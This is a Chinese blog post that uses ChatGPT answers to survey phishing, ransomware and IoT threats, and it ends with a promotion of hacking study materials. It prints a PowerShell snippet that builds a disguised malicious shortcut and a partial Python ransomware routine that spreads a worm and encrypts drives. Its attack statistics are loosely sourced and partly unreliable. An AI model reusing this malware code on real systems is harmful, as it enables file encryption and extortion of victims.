ChatGPT:你真的了解网络安全吗?浅谈攻击防御进行时之传统的网络安全

ChatGPT(全名:Chat Generative Pre-trained Transformer),美国OpenAI 研发的聊天机器人程序,是人工智能技术驱动的自然语言处理工具。

在这里插入图片描述 基于其语言模型庞大、可控制、具有高度扩展性的特点,本文通过对话ChatGPT,浅谈网络安全攻击防御进行时。

【一一帮助安全学习,所有资源获取处一一】

①网络安全学习路线

②20份渗透测试电子书

③安全攻防357页笔记

④50份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年CTF夺旗赛题解析

网络安全新总结

目前网络安全的总体态势可以说是比较严峻的,黑客攻击手段和频率在不断增加,而且攻击手法越来越复杂和隐蔽。

总体来看,从攻击的种类和方式上来看,社交工程攻击和网络钓鱼是黑客攻击的两个主要手段。这种攻击方式主要利用了人们的信任心理,通过发送诱骗信息,获取受害者的敏感信息或者执行恶意程序等。

以下是ChatGPT给出的一些社交工程攻击和网络钓鱼的数据: 在这里插入图片描述部分网络钓鱼代码:

php复制代码$file = Get-Content "test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ''+ $file
$Shortcut.Save()

此外,最近几年还出现了大量的勒索软件攻击事件。勒索软件通常是通过邮件附件或者漏洞攻击入侵系统,然后加密文件,使得受害者无法正常使用个人信息或者机构数据。

以下是ChatGPT给出的一些勒索软件攻击的数据: 在这里插入图片描述

值得一提的是,IOT设备的大规模应用也带来了新的安全挑战,在攻击和防御方面都存在很大的难度。需要IoT设备厂商和相关组织一起提高设备的安全性和规范性,从而保证用户的信息安全。

关于黑客攻击次数上升的数据,由于统计方式和来源的不同,数据各有不同。根据某些研究机构的报告,2019年全球发生的网络攻击事件比2018年增加了50%,而2020年的数字更是创下历史新高,其中大量攻击事件是以勒索软件为主。此外,还有许多未被报告或未被发现的攻击事件,数字应该更高

提问ChatGPT:请列举近年来具有代表性的黑客攻击事件 ChatGPT回答如下: 在这里插入图片描述


根据Symantec公司在2019年发布的报告,全球平均每一个月有5.6亿个网络安全攻击事件发生。

部分勒索病毒代码:

c复制代码def main():
    # 主函数
    os_system = check_os() # 操作系统检测 
    if len(sys.argv) == 2:
        if sys.argv[1]=='en': # 加密
            # 获取aes_key用于加密文件
            # 获取用于提示被勒索者的消息
            aes_key, msg = get_en_msg_key() 

            if os_system == 'windows':
                worm_t = Thread(target=worm)        #开启蠕虫
                worm_t.start()
                drives = get_drives()               #获取磁盘--需要修改
              
                for drive in drives:
                    t = Thread(target=Encrypt, args=(drive,msg,aes_key))  #遍历后加密
                    t.start()
                desk = os.path.join(os.path.expanduser("~"), 'Desktop') + "\\"  #将初始路径组件扩展到用户的主目录
                back_file = desk + "HOW_TO_BACK_FILES.txt"   
                if not os.path.exists(back_file):           #检查指定路径是否存在
                    with open(back_file, "wb") as f:        #创建文本写入msg
                        f.write(msg)
            else:
                t = Thread(target=Encrypt, args=("/",msg,aes_key))  #创建线程,开启加密模块进行加密
                t.start()

根据Check Point Software Technologies公司在2020年发布的报告,由于COVID-19疫情,网络攻击事件在2020年上半年增加了30%,而且勒索软件攻击事件增加了50%

根据Ponemon Institute在2020年发布的报告,其中美国企业的平均数据泄露成本达到了860万美元,而且平均数据泄露时间为280天。


总结

攻与防,是安全人员离不开的话题。 在科技高速发展的背景下,黑客攻击日趋隐蔽性、复杂性、难以防范性,网络安全防御的总体态势也在不断加强。

当前,许多国家和地区都在加强网络安全意识的推广,并建立了完善的法规和标准来规范网络安全行为和技术。同时,各类安全厂商和组织也在不断投入更多的资源和精力,以提高网络安全的水平和能力。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

img

因篇幅有限,仅展示部分资料,如果你对网络安全入门感兴趣,需要的话可以在下方

  • 14
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值